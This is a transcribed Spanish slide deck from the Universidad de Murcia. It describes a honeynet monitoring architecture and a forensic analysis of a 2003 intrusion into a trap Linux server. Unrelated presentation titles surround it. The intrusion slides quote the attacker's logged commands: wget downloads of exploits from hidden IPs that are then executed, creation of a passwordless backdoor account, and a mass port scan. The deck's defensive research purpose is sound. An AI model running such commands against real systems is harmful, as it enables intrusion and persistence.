EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia.

Slides:



Advertisements
Presentaciones similares
¿PARA QUE ESTAMOS AQUÍ? LOS OBJETIVOS DE LA ENCARNACIÓN.
Advertisements

SIES – SISTEMA INTEGRADO DE EDUCACIÓN SUPERIOR
1 Datos sobre webloggers Datos extraidos de la encuesta a webloggers disponibles en la web de los autores.
el 1, el 4 y el 9 tres cuadrados perfectos autosuficientes
Revisión Nº:Descripción:Fecha: 00Elaboración de la documentación30/06/11 Copia Controlada :Nº: F /REV. 00 ACCESO A LA WEB DEL CPR DE TARAZONA Cód.:
Introducción a Linux Lic. Gonzalo Pastor.
Curso de Java Java – Redes Rogelio Ferreira Escutia.
1 LA UTILIZACION DE LAS TIC EN LAS MICROEMPRESAS GALLEGAS. AÑO mayo 2005.
1 LA UTILIZACION DE LAS TIC EN LAS PYMES GALLEGAS AÑO de Junio de 2005.
1 INFORME RESUMEN SOBRE EL NIVEL DE UTILIZACION DE LAS TIC EN LAS EMPRESAS GALLEGAS ( Resumen PYMES ) Noviembre de 2004.
1 INFORME RESUMEN SOBRE EL NIVEL DE UTILIZACION DE LAS TIC EN LAS EMPRESAS GALLEGAS (MICROEMPRESAS, resultados provisionales) 29 de julio de 2004.
1 LA UTILIZACION DE LAS TIC EN LAS PYMES GALLEGAS AÑO Resumen. 24 de Junio de 2005.
AYUDA A LA FUNCIÓN DOCENTE Internet
Nau Gran dHivern Intr. a la creación y gestión de páginas web Introducción a la web.
IDS SISTEMAS DE DETECCIÓN DE INTRUSOS
Internet y tecnologías web
TEMA 2 MÚLTIPLOS Y DIVISORES
1 Logroño, 27 de octubre de 2005JT RedIRIS 2005 Proyecto de implantación de una UPN IEEE 802.1X con autenticación de usuarios basada en tarjeta inteligente.
02- Plan Organización Docente v.2 Noviembre 2009 SIES – SISTEMA INTEGRADO DE EDUCACIÓN SUPERIOR.
02- PLAN DOCENTE Febrero 2009 SIES – SISTEMA INTEGRADO DE EDUCACIÓN SUPERIOR.
01- OFERTA FORMATIVA v.2 Noviembre 2009 SIES – SISTEMA INTEGRADO DE EDUCACIÓN SUPERIOR.
CFGM Redes Locales Documentos: Elementos de configuración de una suite de antivirus. Panda Internet Security 2011.
Aladdín-respuestas 1.Vivía 2.Era 3.Amaba 4.Quería 5.Gustaban 6.Se sentía 7.Salía 8.Tenía 9.Decidió 10.escapó 11. Se vistió 12. Conoció 13. Vio 14. Pensó
Respuestas Buscando a Nemo.
Profesor: Lic. Albino Petlacalco Ruiz M.C. Jose David Alanis Urquieta
SIMATICA V2.0. Automatización de Viviendas con Simatic S7-200
Mulán /75 puntos. 1.Querían 2.Gustaban 3.Escuchó 4.Dijo 5.Tenía 6.Ayudaron 7.Maquillaron 8.Arreglaron 9.Dio 10.Estaba 11.Iba 12.Quería 13.Salió 14.Gritó
© 2007 Cisco Systems, Inc. All rights reserved. Traducido en apoyo a la capacitación de Instructores de la Red Proydesa Comunicación por la red Fundamentos.
1 XML Extensible Markup Language HTML HyperText Markup Language normas06_01.xml.
C ONFIGURACIÓN C UENTAS D E C ORREO ZTE N281. C ONFIGURACIÓN C UENTAS D E C ORREO ZTE N281 1-Ingrese a menú 2-Ingrese a Mensajes 3-Ingrese a Correo 4-Seleccione.
PROTOCOLO SEGURO HTTPS
Programa para el Impulso a la Implementación del Protocolo IPv6 en Instituciones Vinculadas a RENATA 2012 Servicio FTP.
Autodesk Civil 3D 2007 Essentials
Streaming (Retransmisión de contenidos multimedia en Internet)
Phone2Wave-Server Manual de Operación.
Universidad Nacional Autónoma de Honduras
TELEFONÍA IP.
Manuel H. Santander P. Equipo de Seguridad y Contingencia Informática
Índice Introducción: - Fraud Modus Operandi Detección:
Trabajar en una pequeña o mediana empresa o ISP. Capítulo 7
EL OSO APRENDIZ Y SUS AMIGOS
SISTEMA ELECTRONICO DE AVALUOS INMOBILIARIOS VERSION WEBSERVICES
Ecuaciones Cuadráticas
Oscar Navarrete J. Jorge Gutiérrez A.
Seguridad de redes empresariales
Comité Nacional de Información Bogotá, Julio 27 de 2011 Consejo Nacional de Operación de Gas Natural 1 ESTADISTICAS NACIONALES DE OFERTA Y DEMANDA DE GAS.
Aqui está Señoras y Señores !!!!!
JORNADA 1 DEL 24 DE MARZO AL 30 DE MARZO EQUIPO 01 VS EQUIPO 02 EQUIPO 03 VS EQUIPO 06 EQUIPO 05 VS EQUIPO 10 EQUIPO 07 DESCANSA EQUIPO 08 VS EQUIPO 13.
CULENDARIO 2007 Para los Patanes.
Índice Sesión I Bloque I (09:30 a 10:30 Horas) Configuración Inicial
BEATRIZ LAFONT VILLODRE
SI QUIERES VERLO DALE AL CLICK
ESTADOS FINANCIEROS A DICIEMBRE DE 2013.
Módulo 2: Condiciones Generales de Trabajo
Vicegerencia de las TIC - IKT Gerenteordetza SAREZAIN v2 Luismi Hernando Aritz Santxo.
MSc. Lucía Osuna Wendehake
Calendario 2009 “Imágenes variadas” Venezuela Elaborado por: MSc. Lucía Osuna Wendehake psicopedagogiaconlucia.com Enero 2009.
© 2006 Cisco Systems, Inc. Todos los derechos reservados.Información pública de Cisco 1 Listas de control de acceso Acceso a la WAN: capítulo 5.
1 Consigna 2006 UPV/EHU Consigna David Fernández Acin CIDIR Bizkaia Euskal Herriko Unibertsitatea / Universidad del País Vasco XXII.
Direccionamiento de la red: IPv4
FUNDAMENTOS DE CALIDAD EN LA GESTIÓN PÚBLICA
Guía de Implementación
DISEÑO DE LA PROPUESTA DEL PROCESO DE RENDICION DE CUENTAS 2014 Coordinación General de Planificación Ministerio de Agricultura, Ganadería, Acuacultura.
Mejoras y Nuevas Características de ISA Server 2004 Chema Alonso MVP Windows Server Security
Instalación y configuración de servidores. 2 de 9 Servicios Internet (I) “El proyecto Apache es un esfuerzo conjunto para el desarrollo de software orientado.
UNIVERSIDAD TECNOLÓGICA ECOTEC. ISO 9001:2008 Preguntas para ser analizadas para el examen final. 1.- Describa el término de Escaneo de Red. 2.-Tipos de.
File Transfer Protocol.
UD 3: “Implantación de técnicas de seguridad remoto. Seguridad perimetral.” Arquitecturas de cortafuegos Luis Alfonso Sánchez Brazales.
Unidad 4. Servicios de acceso remoto
Transcripción de la presentación:

EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia

2 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

3 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

4 / Objetivos Ámbito de actuación: Evolución del sistema HADES Proyecto fin de carrera desarrollado en la Universidad de Murcia En colaboración con el proyecto de máquinas trampa de RedIRIS

5 / Objetivos Objetivo: Diseño de una arquitectura de red que permita:

6 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

7 / Infraestructura de red Basada en los sistemas HoneyNET Separación entre: Subred de control Subred trampa Subred corporativa Máquina de control: Conectada físicamente a la subred trampa, pero sin interfaz de red en ella Modo puente Activado filtrado paquetes (firewall)

8 / Infraestructura de red Máquina de control Paquete RPM para la instalación del modo puente + firewall Configuración del filtrado/captura de equipos trampa mediante ficheros de configuración: # Ejemplo de fichero de configuración de PED-CONTROL # Maquinas cuyo tráfico se desea capturar: XX.YY captura # Maquinas cuyo tráfico se desea filtrar: ZZ.TT filtra Inicio y parada del puente+firewall con comandos start/stop. Comprobación periódica del tamaño de los ficheros de captura Envío de de alerta Filtrado de tráfico para evitar ataques al exterior

9 / Infraestructura de red Máquinas trampa Se han habilitado los servicios habituales en una organización: FTP telnet SSH Servidor Web Proxy …

10 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

11 / Monitorización de procesos Existen ocasiones en las que están implicadas conexiones encriptadas entre el equipo trampa y el atacante Ejemplo: El atacante instala una versión modificada del servidor OpenSSH (sshd). No es posible la visualización mediante el análisis del tráfico de la red

12 / Monitorización de procesos Solución: Modificaciones a nivel del sistema operativo para el envío remoto de: Procesos/comandos ejecutados Implantación de un módulo a nivel del kernel de Linux que envía información a la máquina de control

13 / Monitorización de procesos Módulo para la monitorización Técnica Se interceptan las llamadas al sistema provocadas por los procesos Se ejecuta el código original, más: El nuevo código, que en nuestro caso envía una trama UDP con el proceso ejecutado El tráfico generado por el módulo será capturado por la máquina de control, junto al resto del tráfico de la máquina

14 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

15 / Análisis de una intrusión Objetivos del análisis Detectar nuevos patrones de ataque y las herramientas utilizadas para ello Obtener pruebas que justifiquen posibles acciones legales sobre el atacante Estudio de nuevas herramientas The Sleuth Kit y Autopsy Forensic Browser

16 / Análisis de una intrusión Metodología: Se utiliza la suma de 3 técnicas: Toda esta información (imágenes + capturas) es pasada a la máquina de análisis para su estudio

17 / Análisis de una intrusión Descripción de la máquina atacada Nombre (ficticio): ped.um.es Linux Red Hat 7.2 Puesta en red: 29 de Mayo de Se descubre que ha sido atacada el día 31 de Mayo del Se permite el acceso monitorizado a la máquina durante 11 días (hasta el día 10 de Junio de 2003).

18 / Análisis de una intrusión Se detecta un aumento del tráfico HTTPS Se recibe un correo electrónico de alerta From: To: Subject: aumento de 543 K en el trafico de XX.YY A las 20:15:00 el equipo de control control.um.es ha detectado un aumento de 543 K en el tráfico con origen o destino la máquina PED XX.YY

19 / Análisis de una intrusión Análisis de tráfico Se ha aprovechado una vulnerabilidad en la llave del protocolo OpenSSL y el servidor Apache. Esto permite iniciar un shell con permisos de Apache. En las conexiones posteriores al tráfico HTTPS, se descubre la descarga de diversos ficheros binarios Análisis forense: Se analizan los ficheros descargados: Exploit pt: Abre un shell con privilegios de root. Se aprovecha de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace (buffer overflow).

20 / Análisis de una intrusión Análisis del tráfico: Instalación del rootkit SuckIT en el directorio /usr/lib/…: Sat May :08: a. d/drwxr-xr-x root/user root /usr/lib/… c -/-rw-rr-- root/user root /usr/lib/…/sk.tgz SuckIT basa su funcionamiento en módulo del núcleo: Oculta PIDs, ficheros, conexiones tcp/udp/socket raw. Integra un shell TTY para el acceso remoto.

21 / Análisis de una intrusión No se registra actividad en la máquina hasta el día 3 de Junio Análisis de tráfico: Se sube mediante el servidor web el fichero /tmp/httpd y se ejecuta: Tue Jun :16: c -/-rwxr-xr-x apache apache /tmp/httpd a. -/-rwxr-xr-x apache apache /tmp/httpd.

22 / Análisis de una intrusión Análisis forense: /tmp/httpd crea un terminal para la ejecución de comandos, con UID de Apache (48). Análisis de procesos (módulo): Para hacerse con permisos de root, el atacante vuelve a descargar el exploit utilizado para el primer ataque (con otro nombre diferente): 21:17: /06/03 [48:sh:26217:ttyp] cd /tmp 21:18: /06/03 [48:sh:26217:ttyp] wget direccIPoculta/ozn/abc/prt 21:19: /06/03 [48:sh:26217:ttyp] chmod +x prt 21:19: /06/03 [48:sh:26217:ttyp]./prt Para asegurarse una entrada posterior al sistema: 21:19: /06/03 [0:sh:26223:ttyp] /usr/sbin/useradd pwd 21:20: /06/03 [0:sh:26223:ttyp] passwd –d pwd

23 / Análisis de una intrusión El atacante instala utilidades para aprovechar la máquina atacada Análisis forense: Se instala un proxy IRC llamado psyBNC: Permite ocultar la IP real a los usuarios del proxy. Mantiene la conexión a IRC aunque se desconecte el cliente

24 / Análisis de una intrusión El atacante quiere evitar que otros atacantes aprovechen la vulnerabilidad que él ha aprovechado para entrar al sistema Análisis forense: Se instala el paquete sslstop.tgz, que contiene dos script: sslstop: Detiene el soporte SSL para Apache sslport: Cambia el puerto SSL por defecto de la máquina

25 / Análisis de una intrusión Desde el día 3 de Junio hasta el día 6 de Junio: Conexiones de IRC Las conversaciones han quedado registradas en el tráfico capturado de la máquina atacada Se han reconstruido algunas con ethereal.

26 / Análisis de una intrusión Tras mantener la máquina comprometida con éxito 7 días, el atacante considera la máquina fiable: Instalación de herramientas para utilizar esta máquina como puente para el ataque a otras: Se instala el exploit con el que se atacó a esta máquina (openssl-too-open). Scanner de puertos

27 / Análisis de una intrusión Análisis de la información del módulo: Descarga del exploit openssl-too-open (http.tgz). 03:52: /06/06 [0:bash:4064:pts] cd /etc 03:52: /06/06 [0:bash:4064:pts] mkdir. 03:52: /06/06 [0:bash:4064:pts] cd. 03:52: /06/06 [0:bash:4064:pts] wget dirIPoculta/valisie/http.tgz Descarga y ejecución del scanner mass 11:58: /06/06 [0:bash:4713:pts] wget dirIPoculta/valisie/mass.tgz 11:58: /06/06 [0:bash:4713:pts] tar xvzf mass.tgz 11:58: /06/06 [0:bash:4713:pts] cd mass 11:58: /06/06 [0:bash:4713:pts]./mass –b 67.0.*.* -s 800 Los filtros aplicados en la máquina de control hacen que estos escaneos no tengan éxito.

28 / Análisis de una intrusión El día 10 de Junio se decide que ya se ha obtenido suficiente información del atacante. Se aplican el filtrado total a través de la máquina de control. Se apaga la máquina y se desconecta de la red.

29 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

30 / Conclusiones Se permite la detección de nuevos tipos y herramientas de ataque sin poner en riesgo los equipos actuales de la organización Con la monitorización de procesos remota: Es fácil ver lo que está sucediendo en la máquina atacada sin tener que cortar la conexión Se obtiene información que no sería posible con las otras técnicas Complementa al análisis forense y análisis del tráfico Vías futuras: Migración de la arquitectura para dar soporte a IPv6 Portar el módulo a otros sistemas operativos Desarrollo de un sistema de aviso de ataques

Feedback: Política de privacidad Feedback
Do Not Sell My Personal Information
Sobre el proyecto: SlidePlayer Condiciones de uso

© 2024 SlidePlayer.es Inc. All rights reserved.